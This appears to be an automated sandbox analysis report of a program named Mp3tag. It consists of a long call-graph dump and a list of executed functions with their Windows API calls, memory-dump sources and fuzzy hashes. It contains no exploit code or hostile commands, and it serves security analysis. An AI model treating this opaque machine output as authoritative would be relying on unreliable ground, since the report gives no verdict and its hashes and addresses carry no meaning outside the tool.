6285->6280 6286->6285 6287 4dd6da 6286->6287 6288 4dd6e2 TlsSetValue 6287->6288 6288->6285 6289 4d6700 6290 4d6718 6289->6290 6293 4d6650 6290->6293 6294 4d6664 6293->6294 6295 4d65b0 2 API calls 6294->6295 6296 4d66a3 6294->6296 6295->6294 6907 4edf94 6909 4edfac 6907->6909 6910 4d5a30 6907->6910 6911 4d5abc 6910->6911 6912 4d5a3c 6910->6912 6914 4d5a51 6911->6914 6915 4d54e0 8 API calls 6911->6915 6912->6914 6916 4d54e0 6912->6916 6914->6909 6915->6914 6917 4d54ef 6916->6917 6918 4d55be 6916->6918 6917->6918 6919 4d5544 6917->6919 6920 4d5220 8 API calls 6917->6920 6918->6914 6921 4d5220 8 API calls 6919->6921 6922 4d5563 6919->6922 6920->6919 6921->6922 6923 4d5220 8 API calls 6922->6923 6924 4d5582 6922->6924 6923->6924 6925 4d55a1 6924->6925 6926 4d5220 8 API calls 6924->6926 6925->6918 6927 4d5220 8 API calls 6925->6927 6926->6925 6927->6918 5911 4d7e90 5918 4dd730 5911->5918 5919 4dd73d 5918->5919 5922 4d7e9b 5918->5922 5919->5922 5939 4dd610 5919->5939 5921 4dd752 TlsGetValue 5921->5922 5923 4d6ff0 5922->5923 5924 4d7002 5923->5924 5925 4d702b LocalAlloc 5924->5925 5926 4d7074 5925->5926 5927 4d716e CreateFileW 5926->5927 5928 4d71e5 5927->5928 5929 4d7247 ReadFile 5928->5929 5934 4d720f 5928->5934 5930 4d7307 5929->5930 5931 4d73ad LoadLibraryA VirtualProtect 5930->5931 5932 4d74ef VirtualProtect 5931->5932 5933 4d6e7e 5931->5933 5932->5934 5933->5932 5935 4d7d40 5934->5935 5936 4d7d5f 5935->5936 5937 4d7d58 5935->5937 5938 4d8af0 8 API calls 5937->5938 5938->5936 5940 4dd61a 5939->5940 5942 4dd64b 5940->5942 5943 4dd634 5940->5943 5945 4d8af0 5940->5945 5942->5921 5943->5942 5944 4d8af0 8 API calls 5943->5944 5944->5942 5948 4d8ad0 5945->5948 5949 4d8920 8 API calls 5948->5949 5950 4d8adf 5949->5950 5950->5943 6308 4d5e10 6309 4d5e20 6308->6309 6310 4d4f40 11 API calls 6309->6310 6311 4d5e28 6310->6311 6312 4d4f10 6313 4d4f1a 6312->6313 6314 4d4f2f 6312->6314 6313->6314 6315 4d5220 8 API calls 6313->6315 6315->6314 6935 4dcb90 6936 4dcbc5 6935->6936 6938 4dcba9 6935->6938 6937 4db100 46 API calls 6937->6938 6938->6936 6938->6937 6939 4eb990 6940 4eb9b1 6939->6940 6942 4ea9e0 6939->6942 6947 4f0990 6942->6947 6944 4eaa0a 6957 4d7e60 6944->6957 6948 4f09c2 6947->6948 6949 4dd210 46 API calls 6948->6949 6950 4f09e3 6949->6950 6960 4eba90 6950->6960 6953 4d9270 11 API calls 6954 4f0a0c 6953->6954 6955 4d8d90 8 API calls 6954->6955 6956 4f0a1c 6955->6956 6956->6944 6958 4d7d40 8 API calls 6957->6958 6959 4d7e7c 6958->6959 6959->6940 6963 4ebac0 6960->6963 6966 4ebaf0 6963->6966 6967 4ebb35 6966->6967 6969 4ebb82 6967->6969 6979 4eb9c0 6967->6979 6970 4ebc19 6969->6970 6977 4ebba2 6969->6977 6971 4d8f00 11 API calls 6970->6971 6973 4ebaac 6971->6973 6972 4ebc0c 6975 4d9dc0 11 API calls 6972->6975 6973->6953 6974 4d8cb0 8 API calls 6974->6977 6975->6973 6976 4d9dc0 11 API calls 6976->6977 6977->6972 6977->6974 6977->6976 6978 4eb9c0 52 API calls 6977->6978 6978->6977 6980 4ec0e0 52 API calls 6979->6980 6981 4eb9e5 6980->6981 6981->6969 6321 4d5d2b 6322 4d5c10 11 API calls 6321->6322 6323 4d5d59 6322->6323 6324 4d8cb0 8 API calls 6323->6324 6325 4d5db8 6324->6325 6982 4dcca1 6983 4d7fa0 13 API calls 6982->6983 6984 4dcc92 6983->6984 6326 4d8b20 6327 4d8b49 6326->6327 6328 4d8b32 6326->6328 6329 4d51c0 8 API calls 6327->6329 6329->6328 6330 4d9520 6333 4d94b0 6330->6333 6334 4d94c2 6333->6334 6338 4d9501 6333->6338 6335 4d8bd0 14 API calls 6334->6335 6334->6338 6336 4d94df 6335->6336 6337 4d8d00 8 API calls 6336->6337 6337->6338 6339 4d5120 6340 4dd730 8 API calls 6339->6340 6341 4d5129 6340->6341 6342 4d5720 6345 4d56b0 6342->6345 6347 4d56c7 6345->6347 6346 4d570a 6347->6346 6349 4d5290 6347->6349 6350 4dd730 8 API calls 6349->6350 6351 4d529c 6350->6351 6351->6346 6352 4de920 6353 4de939 6352->6353 6354 4de934 6352->6354 6356 4de620 6354->6356 6359 4de180 6356->6359 6361 4de1ac 6359->6361 6360 4de312 6360->6353 6361->6360 6363 4de720 6361->6363 6364 4de737 _Ref_count 6363->6364 6365 4de74c 6364->6365 6367 4de780 LocalFree 6364->6367 6365->6360 6367->6365 6998 4ddbb5 6999 4ddbe3 6998->6999 7000 4ddce5 RaiseException 6999->7000 7003 4ddd13 6999->7003 7006 4dde05 7000->7006 7001 4dde51 7004 4ddebd 7001->7004 7005 4dde59 GetLastError 7001->7005 7002 4dde42 LoadLibraryA 7002->7001 7003->7001 7003->7002 7003->7006 7004->7006 7010 4de680 LocalAlloc 7004->7010 7007 4dde6f 7005->7007 7007->7004 7008 4dde8c RaiseException 7007->7008 7008->7006 7010->7006 6376 4ee334 6382 4ee378 6376->6382 6377 4d8d90 8 API calls 6378 4ee5f6 6377->6378 6380 4db010 8 API calls 6378->6380 6379 4ee4dd 6379->6377 6381 4ee606 6380->6381 6382->6379 6384 4dae30 6382->6384 6387 4daad0 6384->6387 6388 4dab1f 6387->6388 6392 4dab45 6387->6392 6389 4dab2d 6388->6389 6390 4d5220 8 API calls 6388->6390 6391 4db010 8 API calls 6389->6391 6390->6389 6407 4dab40 6391->6407 6393 4dabd5 6392->6393 6394 4d5220 8 API calls 6392->6394 6395 4dabe8 6393->6395 6397 4d5220 8 API calls 6393->6397 6394->6393 6396 4dabf9 6395->6396 6398 4dac56 6395->6398 6399 4dac3c 6396->6399 6410 4daa80 6396->6410 6397->6395 6401 4d4f40 11 API calls 6398->6401 6400 4d4fa0 8 API calls 6399->6400 6404 4dac49 6400->6404 6403 4dac5f 6401->6403 6408 4dacbc 6403->6408 6413 4da880 6403->6413 6404->6407 6409 4daad0 17 API calls 6404->6409 6406 4db010 8 API calls 6406->6404 6407->6379 6408->6406 6409->6404 6411 4da4d0 8 API calls 6410->6411 6412 4daa89 6411->6412 6412->6399 6414 4da8a0 6413->6414 6421 4da92e 6413->6421 6415 4da8e9 6414->6415 6416 4da8aa 6414->6416 6419 4daa20 6415->6419 6420 4da903 6415->6420 6415->6421 6417 4da8b4 6416->6417 6418 4da9d0 6416->6418 6422 4da8bd 6417->6422 6423 4da912 6417->6423 6418->6421 6443 4da690 6418->6443 6419->6421 6454 4db090 6419->6454 6426 4daa41 6420->6426 6427 4da910 6420->6427 6421->6408 6424 4da933 6422->6424 6425 4da8ca 6422->6425 6423->6421 6432 4d9380 14 API calls 6423->6432 6424->6421 6434 4d9330 8 API calls 6424->6434 6428 4da975 6425->6428 6429 4da8d7 6425->6429 6430 4d5220 8 API calls 6426->6430 6427->6421 6435 4d9270 11 API calls 6427->6435 6428->6421 6439 4da660 6428->6439 6429->6426 6437 4da8e4 6429->6437 6430->6421 6432->6423 6434->6424 6435->6427 6437->6421 6438 4da880 17 API calls 6437->6438 6438->6437 6440 4da676 6439->6440 6442 4da66e 6439->6442 6441 4d5220 8 API calls 6440->6441 6441->6442 6442->6428 6444 4da840 6443->6444 6452 4da6bb 6443->6452 6444->6418 6445 4da690 17 API calls 6445->6452 6446 4d9380 14 API calls 6446->6452 6447 4db090 17 API calls 6447->6452 6448 4d9330 8 API calls 6448->6452 6449 4d5220 8 API calls 6449->6452 6450 4d9270 11 API calls 6450->6452 6451 4da660 8 API calls 6451->6452 6452->6444 6452->6445 6452->6446 6452->6447 6452->6448 6452->6449 6452->6450 6452->6451 6453 4da880 17 API calls 6452->6453 6453->6452 6455 4db0bb 6454->6455 6456 4db0a5 6454->6456 6460 4db010 8 API calls 6455->6460 6456->6455 6457 4db0ab 6456->6457 6461 4dae70 6457->6461 6459 4db0b9 6459->6419 6460->6459 6462 4dae79 6461->6462 6463 4dae92 6461->6463 6467 4daea0 6462->6467 6465 4db010 8 API calls 6463->6465 6466 4dae90 6465->6466 6466->6459 6470 4daec7 6467->6470 6474 4dafd0 6467->6474 6468 4db010 8 API calls 6469 4daffb 6468->6469 6469->6466 6471 4d4f40 11 API calls 6470->6471 6470->6474 6472 4daf6b 6471->6472 6473 4da880 17 API calls 6472->6473 6472->6474 6473->6474 6474->6468 6475 4d3d30 6478 4d33c0 6475->6478 6477 4d3d49 6479 4d3629 6478->6479 6480 4d33f4 6478->6480 6482 4d364a 6479->6482 6486 4d341a 6479->6486 6481 4d3403 6480->6481 6487 4d34b7 Sleep 6480->6487 6484 4d34e0 6481->6484 6481->6486 6483 4d2e40 Sleep 6482->6483 6483->6486 6489 4d2e40 6484->6489 6486->6477 6487->6481 6488 4d34d0 Sleep 6487->6488 6488->6480 6490 4d2e95 6489->6490 6491 4d2e4d 6489->6491 6490->6486 6491->6490 6492 4d2e75 Sleep 6491->6492 6492->6491 6493 4d9530 6496 4d9450 6493->6496 6497 4d94a2 6496->6497 6498 4d9462 6496->6498 6498->6497 6499 4d8b70 11 API calls 6498->6499 6500 4d947a 6499->6500 6501 4d8cb0 8 API calls 6500->6501 6501->6497 6502 4d2930 FindClose 6503 521598 6502->6503 6504 4d6e30 6507 4d6b50 GetCurrentThreadId 6504->6507 6506 4d6e40 6508 4d6b68 6507->6508 6509 4d6b61 6507->6509 6508->6506 6510 4d5220 8 API calls 6509->6510 6510->6508 6511 4d6730 6512 4d8cb0 8 API calls 6511->6512 6513 4d6748 6512->6513 6515 4d6780 6513->6515 6516 4d66e0 6513->6516 6517 4dd1f0 11 API calls 6516->6517 6518 4d66f0 6517->6518 6518->6515 7016 4d39b0 7017 4d39cf 7016->7017 7018 4d3a80 7016->7018 7021 4d39de 7017->7021 7022 4d3a27 7017->7022 7019 4d3a89 7018->7019 7020 4d3d05 7018->7020 7023 4d3aa2 7019->7023 7030 4d3bb1 7019->7030 7039 4d39ea 7020->7039 7051 4d3240 7020->7051 7025 4d33c0 3 API calls 7021->7025 7021->7039 7024 4d33c0 3 API calls 7022->7024 7029 4d3ac7 7023->7029 7031 4d3b7c 7023->7031 7023->7039 7036 4d3a44 7024->7036 7035 4d39fd 7025->7035 7027 4d3be9 7028 4d33c0 3 API calls 7027->7028 7027->7039 7037 4d3cd3 7028->7037 7034 4d2e40 Sleep 7029->7034 7029->7039 7030->7027 7032 4d2e40 Sleep 7030->7032 7030->7039 7033 4d33c0 3 API calls 7031->7033 7032->7027 7042 4d3b87 7033->7042 7034->7039 7035->7039 7044 4d3790 7035->7044 7036->7039 7040 4d3790 3 API calls 7036->7040 7037->7039 7041 4d3790 3 API calls 7037->7041 7040->7039 7041->7039 7042->7039 7043 4d3790 3 API calls 7042->7043 7043->7039 7045 4d37ad 7044->7045 7046 4d37b4 7044->7046 7045->7046 7049 4d3842 Sleep 7045->7049 7047 4d37be 7046->7047 7048 4d2e40 Sleep 7046->7048 7047->7039 7048->7047 7049->7046 7050 4d3865 Sleep 7049->7050 7050->7045 7052 4d326d VirtualQuery 7051->7052 7053 4d336b 7051->7053 7055 4d32a9 7052->7055 7056 4d3332 7052->7056 7057 4d33c0 3 API calls 7053->7057 7061 4d3319 7053->7061 7055->7056 7059 4d32dd VirtualAlloc 7055->7059 7058 4d33c0 3 API calls 7056->7058 7062 4d3385 7057->7062 7064 4d333a 7058->7064 7059->7056 7060 4d32fb VirtualAlloc 7059->7060 7060->7056 7060->7061 7061->7039 7062->7061 7063 4d3790 3 API calls 7062->7063 7063->7061 7064->7061 7065 4d3790 3 API calls 7064->7065 7065->7061 7066 4d52b0 7067 4dd730 8 API calls 7066->7067 7068 4d52ba 7067->7068 7069 4dd730 8 API calls 7068->7069 7070 4d52c5 7069->7070 7075 4d8fb0 7076 4d8bd0 14 API calls 7075->7076 7077 4d8fcc 7076->7077 7078 4d8d00 8 API calls 7077->7078 7079 4d8fea 7078->7079 6519 4d8132 6520 4d8137 6519->6520 6525 4d7e90 6520->6525 6523 4d7fa0 13 API calls 6524 4d8141 6523->6524 6526 4dd730 8 API calls 6525->6526 6527 4d7e9b 6526->6527 6528 4d6ff0 6 API calls 6527->6528 6529 4d7ebd 6528->6529 6530 4d7d40 8 API calls 6529->6530 6531 4d7ec8 6530->6531 6531->6523 7080 4dadb2 7081 4daded 7080->7081 7082 4dadc6 7080->7082 7083 4db010 8 API calls 7081->7083 7082->7081 7084 4db010 8 API calls 7082->7084 7085 4dadfb 7083->7085 7084->7082 7086 4d7e90 14 API calls 7085->7086 7087 4dae00 7086->7087 7088 4d7fa0 13 API calls 7087->7088 7089 4dae05 7088->7089

                                                                                                            Executed Functions

                                                                                                            Function 004DBFA0 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 149registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Open$QueryValue$CloseFileModuleName
                                                                                                            • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                                            • API String ID: 2701450724-3496071916
                                                                                                            • Opcode ID: 97bc5595822fa344357195f0af5ec557e157e43fd663190503ed45b1b7708928
                                                                                                            • Instruction ID: a1c37ac03a2dd5462dffb6438a1cf87037b13661171c91d62322b2c6db00299d
                                                                                                            • Opcode Fuzzy Hash: 97bc5595822fa344357195f0af5ec557e157e43fd663190503ed45b1b7708928
                                                                                                            • Instruction Fuzzy Hash: 9161EA71204B8689DB30DF61E8A83DA23A5F79978CF50112B9A4C5BB29DF78C645C349
                                                                                                            Function 004DC6F0 Relevance: 3.1, APIs: 2, Instructions: 58COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • GetUserDefaultUILanguage.KERNEL32 ref: 004DC71E
                                                                                                            • GetLocaleInfoW.KERNEL32 ref: 004DC737
                                                                                                              • Part of subcall function 004DC510: FindFirstFileW.KERNEL32 ref: 004DC542
                                                                                                              • Part of subcall function 004DC510: FindClose.KERNEL32 ref: 004DC55D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                                            • String ID:
                                                                                                            • API String ID: 3216391948-0
                                                                                                            • Opcode ID: 85afc7effb7768b0130ff448384d9875327c7c2772873cde7eb6914f648ab13a
                                                                                                            • Instruction ID: e7deab9dbb69946aa8e4713cc8eb58632f8334491117254e11ffe3f8f97bdf9b
                                                                                                            • Opcode Fuzzy Hash: 85afc7effb7768b0130ff448384d9875327c7c2772873cde7eb6914f648ab13a
                                                                                                            • Instruction Fuzzy Hash: 8D21F366220A9189CB10EF36C8A13ED27A1FB98B8CF50110BFB4E87B59DF38C445C794
                                                                                                            Function 004DC510 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 166 4dc510-4dc558 call 4d8e40 call 4d9c10 FindFirstFileW 171 4dc55a-4dc55d FindClose 166->171 172 4dc562-4dc57c call 4d8cb0 166->172 171->172
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 2295610775-0
                                                                                                            • Opcode ID: cc969e71d07db41e5b43f874fbf39954258d2ae6040c688f929cf4df39cf9161
                                                                                                            • Instruction ID: 60acd81ad8d44bed89ee2115bfa29e2746756dceacbea65351a6adf272d1edfe
                                                                                                            • Opcode Fuzzy Hash: cc969e71d07db41e5b43f874fbf39954258d2ae6040c688f929cf4df39cf9161
                                                                                                            • Instruction Fuzzy Hash: 42F0E2222129C089CB71EF31C8B53ED2351DB82B6CF08031BE26D0BBE5DE18C685C708
                                                                                                            Function 004DBB50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32 ref: 004DBB80
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 004DBBB1
                                                                                                            • EnterCriticalSection.KERNEL32 ref: 004DBC87
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 004DBCC0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$EnterLeave
                                                                                                            • String ID: en-GB,en,en-US,
                                                                                                            • API String ID: 3168844106-3021119265
                                                                                                            • Opcode ID: 1013491558da1f222ac7efd40a1545fdac9a9f54399ba95a1b76b3ff7a67d836
                                                                                                            • Instruction ID: 0a361a0b5a75a27aa9538f7c24d4a3a214b2da01cb63c4b37b72c75e04dd4567
                                                                                                            • Opcode Fuzzy Hash: 1013491558da1f222ac7efd40a1545fdac9a9f54399ba95a1b76b3ff7a67d836
                                                                                                            • Instruction Fuzzy Hash: E7415361210A14C4EB10EF72D8B13EA2762FB54B8DF45211BFA4E87B69DF6CC884C794
                                                                                                            Function 004D6FF0 Relevance: 9.3, APIs: 6, Instructions: 299memoryfilelibraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileProtectVirtual$AllocCreateLibraryLoadLocalRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 2652859266-0
                                                                                                            • Opcode ID: b7ca9340e0195c5cd3e5b5db672121f09d4a954442ef2e14d278ddfddc3638d6
                                                                                                            • Instruction ID: 21c1ca855ff39210241120d3e8da0488ab51e47819ef2aa8d609a5dc987b5b19
                                                                                                            • Opcode Fuzzy Hash: b7ca9340e0195c5cd3e5b5db672121f09d4a954442ef2e14d278ddfddc3638d6
                                                                                                            • Instruction Fuzzy Hash: 4FF14F76609B848ACB60CB1AE49075EBBB1F7C9B94F104116EB8D83B28DF79D855CF00
                                                                                                            Function 004D73F5 Relevance: 3.1, APIs: 2, Instructions: 93memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 114 4d73f5-4d752b VirtualProtect call 4d6e7e VirtualProtect 117 4d7533-4d7547 114->117 118 4d7579-4d75dc 117->118 119 4d7549-4d7577 117->119 119->117
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ProtectVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 544645111-0
                                                                                                            • Opcode ID: aab1ea047be3a169c83380eb997ccd11a6dca259d2f9046aacf96139efbf4602
                                                                                                            • Instruction ID: dc1e32232c3aa699878de91e2298750756a1f953c43cc83fe6aff9e7dfca5c5c
                                                                                                            • Opcode Fuzzy Hash: aab1ea047be3a169c83380eb997ccd11a6dca259d2f9046aacf96139efbf4602
                                                                                                            • Instruction Fuzzy Hash: 74414E76609BC48ACBA0CB5AE49079AB7A0F7C9B90F114516EBCD83B29DF78D4548F00
                                                                                                            Function 004DD440 Relevance: 3.0, APIs: 2, Instructions: 35threadCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            • SetThreadLocale.KERNELBASE ref: 004DD463
                                                                                                              • Part of subcall function 004DB390: InitializeCriticalSection.KERNEL32(?,?,?,?,004DD46D), ref: 004DB39B
                                                                                                              • Part of subcall function 004DB390: GetVersion.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3A9
                                                                                                              • Part of subcall function 004DB390: GetModuleHandleW.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3D0
                                                                                                              • Part of subcall function 004DB390: GetProcAddress.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3DF
                                                                                                              • Part of subcall function 004DB390: GetModuleHandleW.KERNEL32(?,?,?,?,004DD46D), ref: 004DB3F2
                                                                                                              • Part of subcall function 004DB390: GetProcAddress.KERNEL32(?,?,?,?,004DD46D), ref: 004DB401
                                                                                                              • Part of subcall function 004DB390: GetModuleHandleW.KERNEL32(?,?,?,?,004DD46D), ref: 004DB414
                                                                                                              • Part of subcall function 004DB390: GetProcAddress.KERNEL32(?,?,?,?,004DD46D), ref: 004DB423
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004DD501
                                                                                                              • Part of subcall function 004DD320: GetVersion.KERNEL32 ref: 004DD324
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000009.00000002.1502984786.00000000004D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 004D0000, based on PE: true
                                                                                                            • Associated: 00000009.00000002.1502968082.00000000004D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.00000000004E4000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1502984786.000000000050C000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000050F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503040659.000000000051B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503066999.0000000000521000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000523000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            • Associated: 00000009.00000002.1503079256.0000000000525000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_9_2_4d0000_Mp3tag.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc$ThreadVersion$CriticalCurrentInitializeLocaleSection
                                                                                                            • String ID:
                                                                                                            • API String ID: 129254435-0
